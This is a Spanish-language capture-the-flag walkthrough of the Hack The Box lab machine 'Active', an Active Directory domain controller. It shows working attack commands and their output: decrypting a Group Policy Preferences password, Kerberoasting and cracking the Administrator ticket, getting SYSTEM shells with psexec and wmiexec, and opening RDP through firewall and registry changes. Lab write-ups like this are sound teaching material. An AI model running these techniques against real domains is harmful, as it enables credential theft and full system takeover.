Información de la máquina.
| Contenido | Descripción |
|---|---|
| OS: |  |
| Dificultad: | Facil |
| Puntos: | 20 |
| Lanzamiento: | 28-Julio-2018 |
| IP: | 10.10.10.100 |
| Primera sangre de usuario: | m0noc |
| Primera sangre de system: | no0ne |
| Creadores: | eks & mrb3n |
Reconocimiento.
Como siempre comenzaremos con un escaneo a los 65535 puertos de la máquina para poder encontrar cuales son los puertos abiertos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
intrusionz3r0@kali:~$ nmap -p- --open -T5 -n -oG nmapScanAllPorts active.htb -Pn --min-rate 2000
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 23:04 CDT
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.18s latency).
Not shown: 42307 filtered ports, 23216 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 56.82 seconds
Una vez terminado el escaneo lanzaremos scripts de enumeración básicos para detectar los servicios y versiones de los puertos abiertos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
intrusionz3r0@kali:~$ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 -oN targeted -Pn active.htb
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-04 19:45:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp filtered unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m44s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-04T19:46:22
|_ start_date: 2020-09-04T19:41:14
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 4 14:45:44 2020 -- 1 IP address (1 host up) scanned in 197.08 seconds
Al ver que tenemos demasiados puertos comenzare a enumerar puertos comunes.
Enumeracion Samba.
Utilizaré la herramienta smbclient para enumerar los recursos compartidos del servicio samba.
1
2
3
4
5
6
7
8
9
10
11
12
13
intrsionz3r0@kali:~$ smbclient -L //active.htb/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
Después utilizare smbmap para enumerar los permisos sobre los recursos compartidos.
1
2
3
4
5
6
7
8
9
10
11
intrusionz3r0@kali:~$ smbmap -H active.htb
[+] IP: active.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Como se puede observar tenemos acceso de lectura al recurso Replication por lo que pasaremos a enumerarlo.
Hay varias formas.
Método 1
Utilizando smbclient.
1
2
3
4
5
6
7
8
9
intrusionz3r0@kali:~$ smbclient -U "" //active.htb/Replication -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
active.htb D 0 Sat Jul 21 05:37:44 2018
10459647 blocks of size 4096. 4931697 blocks available
smb: \>
Método 2 Descargando el recurso compartido utilizando smbget.
1
2
3
4
5
6
7
8
9
10
11
intrusionz3r0@kali:~$ smbget -R smb://active.htb/Replication -U ""
Password for [] connecting to //Replication/active.htb:
Using workgroup WORKGROUP, guest user
smb://active.htb/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
smb://active.htb/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
smb://active.htb/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
smb://active.htb/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
smb://active.htb/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
smb://active.htb/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
smb://active.htb/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Downloaded 8.11kB in 29 seconds
Método 3 Otra es montando el recurso compartido utilizando mount.
Tuve problemas al montarlo con sesiones nulas pero de todas formas les dejo el comando para montar un recurso.
1
sudo mount -t cifs //active.htb/Replication /mnt/HTB/Active -o username="{user}",password="{pass}",domain=active.htb,rw
Yo utilizare el segundo método.
Una vez descargado el recurso compartido hago una búsqueda dentro de este.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
intrusionz3r0@kali:~$ find .
.
./Policies
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./DfsrPrivate
./DfsrPrivate/Installing
./DfsrPrivate/ConflictAndDeleted
./DfsrPrivate/Deleted
./scripts
El archivo que mas destaca es: Groups.xml.
Vamos a echarle un vistazo.
1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Como podemos observar tenemos un usuario y una contraseña cifrada.
Crackeando GPP.
Usuario: SVC_TGS.
Hash: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Debemos averiguar el tipo de cifrado de este hash.
Lo que te recomiendo para este punto es que comiences a realizar búsquedas con palabras clave ya que eso te ayudaran a dar con la solución mas rápido.
Un ejemplo es:
La búsqueda nos retorno lo que parece ser algunas herramientas para descifrar el hash, entre ellas vemos que destaca la página de tools.kali.org, por lo que es muy probable de que kali linux tenga una herramienta incorporada para este propósito.
Rápidamente abro una terminal y ejecuto el siguiente comando:
1
2
3
intrusionz3r0@kali:~$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
¡¡Eureka!! ahora que tenemos unas credenciales voy a verificar que sean validas utilizando crackmapexec.
1
2
3
intrusionz3r0@kali:~$ cme smb active.htb -u "SVC_TGS" -p "GPPstillStandingStrong2k18"
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
Como puedes observar la herramienta nos retorna el símbolo de + lo que significa que el usuario existe.
Ahora podemos continuar enumerando el recurso compartido con el nuevo usuario.
Podemos usar crackmapexec para enumerar los recursos compartidos y los permisos ejecutando el siguiente comando:
1
2
3
4
5
6
7
8
9
10
11
12
13
intrusionz3r0@kali:~$ cme smb active.htb -u "SVC_TGS" -p "GPPstillStandingStrong2k18" --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
Tenemos permisos de lectura en varios recursos comenzaré a enumerar cada uno de estos.
El que mas destaco fue el recurso Users ya que este nos dio acceso al directorio Users.
Así que podemos acceder a leer la flag de user.txt.
Kerberoasting.
En este punto nosotros como atacantes debemos de probar varios ataques comunes en un directorio activo, uno de estos es el famoso ataque de Kerberoasting.
¿Que es kerberos?
Kerberos es un protocolo de autenticación, pero no de autorización. Esto quiere decir que el protocolo se encarga de identificar a cada usuario, a través de una contraseña solo conocida por este, pero no determina a qué recursos o servicios puede acceder o no dicho usuario.
Kerberos es ampliamente utilizado en Active Directory. En esta plataforma Kerberos da información de los privilegios de cada usuario autenticado, pero queda a cargo de los servicios el verificar que dichos privilegios son suficientes para acceder a sus recursos.
¿Como funciona el ataque de Kerberoasting?
Cuando un usuario inicia sesión en kerberos este recibe un ticket TGT (Ticket Granting Ticket) el cual esta firmado por la cuenta krbtgt que te identifica como usuario, con este ticket un usuario puede solicitar un ticket TGS (Ticket Granting Service) para solicitar el acceso a diferentes recursos del dominio. Parte de un ticket TGS esta cifrado con el hash NTLM de las cuentas de servicio para el recurso solicitado.
Windows usa los principales nombres de servicio (SPN) para identificar que cuentas de servicio se esta utilizando y cifrar el TGS.
Hay dos tipos
- SPNs vinculados a la cuenta de una computadora (basados en host).
- SPNs vinculados con una cuenta de dominio.
Cuando se registra un SPN para una cuenta de usuario que utilizara x servicio este utiliza el hash NT del usuario por lo que si la contraseña es muy débil un atacante podría descifrarla con facilidad.
Lo que haremos a continuación será solicitar un ticket TGS para descifrarlo de manera local, ya que como habíamos mencionado una parte de este ticket se cifra con el hash NT de la cuenta de usuario y si la contraseña es muy débil esta se podría descifrar con mucha facilidad.
Podemos llevar acabo el ataque con dos herramientas diferentes:
Método 1: GetUserSPNs.
GetUserSPNs.py del repositorio de impacket.
1
2
3
4
5
6
7
8
9
10
11
intrusionz3r0@kali:~$ GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.22.dev1+20200819.170651.b5fa089b - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40.351723 2018-07-30 12:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a739d4c286fb2f762c65a2fb58d37df$c65b8d7e94dd1fe7a7bb3d948e37ada6667c21f8c392d112495932edfd05eb88dee4ae101bf63dfb093e4a44b8c2d0d9ae762032050936d0a49647f25cf70332f960a27a7a47d8a361a5841a51e35eb39be3ca7f8294f9a5957b976dbf3b051a996c1f3798ee2079c06a98f34b0767bdf705532aeb7608ef273d3456527f17a94729bc9419439becb238c96e8883c16aea1807cb1e06d181b24f52a544059dec63b5df3df4a47b063ab91264186937b08880106cd13e7483a22177d1aa0084bdbf3f81aaeff93b851e848285f848b08f751c77af648129912b7140e4c2a1d60e592af730c61914df375690d9a7630369e2b090941341f1d33de91fbe6f7c05fb90bd90859fd166896051ee05b9da5bd918bb0e59b7bab43676b7e39365092a0be81b203ca2ab037662bc1c2c8f8e059fd556291012c115be698d466b14c9f6e0b190676badc600cbb951d19852fe65b8bd62ccca9b91f49deb4be4d7de31ebade2a847a614087f47a9e833252c874ace9b3e9f3c95abb222226424f842b3b64b22e28b82d967ce08dae1b437595a16fd2de66592b254431f31fb7402cfee0f5fc3d2b2025c1141abf9b3a8402642598d3bad9134c70eba29515f3ac69724174da94cb01def0a7061c4d9bdf9856f947c61949668afdec6ea973b96ded76ad8d9fd77391a04c894aaa7c08d354365dd9be1c1ca7da9359d7f89b74ebfa093f4c61a32a86413cdab4829c0f7ee65781a539c90272ce204dbc968dd1457e3a950120011fcacfa994d83ea14b7ee18ac7f450442a1be5619086bf35459e493a377f888d22489752867911f1a83f908e019156c67efd0d93eb9caaf1d299db0f84bce644296f591c53553e55d37aa3f1f5ee9198b7deff55c509b4e6c5d5eaf4a9f9186e5f8089c6ea33e3823268c80027cd4b603279121377d37f57ee33210efd1f701c9630a741716a6a44954237e67166fc28620feef7fff85857001187c620d8bce1f6b5871905f5dc7a528c7fc0225d1ff98ec16d1fe64426fe429b805a9709653ce7816dad363640d79aa34d1c8cfb9a4490dfa06494d277066751935da3cf3a65c91604ef167fc2ab3cb0ded7f253b7a6788e350ac2dc4cdc91282f3496d45873333469f607d7f3dc9de50a504f9b0d838e25d2bc590f901ed665a51b6180d043cfe5eb2afe97aeb1959f1c5c1f5a4445f23763cca59589a7a31ef2690977eaa9682643cfda93a03ec6bf0142409f8747ed785ed0b31533e67
Método 2: Crackmapexec.
1
2
3
4
intrusionz3r0@kali:~$ cme ldap active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --kerberoasting TGS-REP
LDAP 10.10.10.100 389 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP 10.10.10.100 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.10.10.100 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$d245fa23a6882593c7f3dd79aa3ee74f$60a02070c06f8df9379c8dcdb952a83bae6f19bd219cb5750a0ea6ec5666dde0388940a99a20e54c83f4dc7fe380f05150d1be2db24436f47981061fa273083c9296e520ad39897ff24ada5bfd90a7ebe3c1f63eccd0ded64e89d8365034679e3eabf8a45d2b699e90763dca815f5779c38730bfdf87c10bf0d2c4a26c1d72525e5330d6f42275bc9cf8c7638b0a510b56573009f0837746f24d8ca2b739a8822fd59394a588802d9a7bc210d31381e7c33cafeb1ad80f6ffa27181217f33794a6f1ced3a9c04726bbbbb9a6e2a42168d346f026eb34687c09dc9cd5602cd88914ebfedd0f00ee8f98af9dc196039499f2793a8e477a02dd9f48900831aa08ab69e74a7d8223f5ca8811f06c94f9b4b2d0bc30aa2ffe5941c5c28578b75f144c4e7e25936a0b24acd22b76d5c9cc51d41c1bd976cd26fc3a21584da810f7520f22a49a6052815895d72d247638986055bf23cfcc07282f2b1b9e530a97df71b32b1a43d7eb0c0382e28cecd87a1b67b7603d245c114f3d1947bdebba9c6b6843463ecac095f5019bccac557b5cb39637a833ed492e9b0d7b1d0d8f25d54a16d5d6a7ad97b8872ebc182e8a72a719407b37af5eed9960988f6162dc57b9e82c8212342f6f77e232024f120130b64aff583dcc36d18b781d4f550fe40487497be681430f1e2d6ffb93a0e383fc3499d3e04bdcc22920da5940f895775cb6a4ee602ddb6966aca6cdce0e96ef940cc1c7447f76713aadd5d7ecaba5841ccc3b99f115ed9f01b950942983500eda336da0a168cd1f7344cfbbe24a4ff09f928647fcb9d78c55ca1b91c908e3a56efcc733163bebf29127331df7fc1c8e6efa0fde591f950ef31b72fe99e699361bcc3a59bc72545fe6dd60685231e44bdcef57f1b349998011753ede3349421056063b70cb05754819fa2c1c477d988021fbeaf623f45546c1ca18395adfba5d5e6dc8fae6d094dbb276b6abc58423f8836ff27c215373dfcf11b1c50b69e4b44f30021f764862c483c1fda0b8d2307b8909ed19c5c85fe56f1ab8de826075d8be0b469ace18256ee48a0c2371e6a59ba73814be715c82230d169b9655ca3b2af7f59793f1a6bc4b3da1620c3bb92b1cec53f4d81b1e570e43979af0cabba57725915695ff7ebd6bd96218ccb781a0695390385eb727103b89c9485a7cbca58dafe976d4bba83b17cb9284ea29600ac90946238ff98dbe6ce104b755cec348ca10eeaec4ffb3410ebc738e8d4ee0bd
Para descifrar el TGS-REP podemos usar dos herramientas..
Método 1: John.
1
intrusionz3r0@kali:~$ john -w=/usr/share/wordlists/rockyou.txt hash
Método 2: Hashcat.
1
intrusionz3r0@kali:~$ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --force
Ahora que tenemos unas credenciales podemos verificar que la contraseña sea valida utilizando crackmapexec.
1
2
3
intrusionz3r0@kali:~$ cme smb active.htb -u "Administrator" -p "Ticketmaster1968"
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
Ahora podemos obtener una shell como administrador.
Podemos usar psexec.py.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
intrusionz3r0@kali:~$ psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.22.dev1+20200819.170651.b5fa089b - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file XaiZpWXe.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service UApW on 10.10.10.100.....
[*] Starting service UApW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
También podemos usar la herramienta wmiexec.py.
1
2
3
4
5
6
7
8
intrusionz3r0@kali:~$ wmiexec.py 'administrator:Ticketmaster1968@10.10.10.100'
Impacket v0.9.22.dev1+20200819.170651.b5fa089b - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
Antes de terminar me gustaría conectarme de manera remota a la máquina.
Para ello necesitamos crear una regla de firewall que permita el trafico de entrada y salida por el puerto 3389.
1
2
3
C:\Windows\system32> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
C:\Windows\system32> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=out localport=3389 action=allow
C:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
y para conectarnos de manera remota podemos usar la herramienta Remmina.
O bien la herramienta xfreerdp.
1
intrusionz3r0@kali:~$ xfreerdp /u:Administrator /d:active.htb /p:'Ticketmaster1968' /v:10.10.10.100
¡¡Somos Administradores!!
Espero te haya gustado, recuerda seguirme en mis redes sociales para estar al pendiente de todo mi contenido.